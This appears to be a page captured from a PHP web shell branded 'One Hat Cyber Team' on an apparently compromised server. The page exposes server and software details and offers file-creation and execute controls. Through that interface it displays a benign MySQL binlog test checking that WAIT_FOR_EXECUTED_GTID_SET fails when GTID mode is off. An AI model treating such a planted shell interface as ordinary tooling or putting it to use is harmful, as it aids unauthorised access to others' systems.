⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.124
Server IP:
50.28.103.30
Server:
Linux host.jcukjv-lwsites.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software:
nginx/1.28.0
PHP Version:
8.3.12
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
www
/
server
/
mysql
/
mysql-test
/
suite
/
binlog
/
t
/
View File Name :
binlog_wait_for_executed_gtid_set_no_gtid.test
# WL#7796 - WAIT_FOR_EXECUTED_GTID_SET # # This test checks that we can use the wait_for_executed_gtid_set # functionality only if GTID_MODE = ON, otherwise we will get error message # ER_GTID_MODE_OFF. # --source include/have_log_bin.inc --source include/have_binlog_format_mixed.inc --source include/not_gtid_enabled.inc --let $master_uuid= query_get_value(SELECT @@SERVER_UUID, @@SERVER_UUID, 1) CREATE TABLE t1 (c1 INT NOT NULL PRIMARY KEY) ENGINE=InnoDB; INSERT INTO t1 VALUES (1); --replace_result $master_uuid MASTER_UUID --error ER_GTID_MODE_OFF SELECT WAIT_FOR_EXECUTED_GTID_SET('$master_uuid:1-2', 9999); DROP TABLE t1;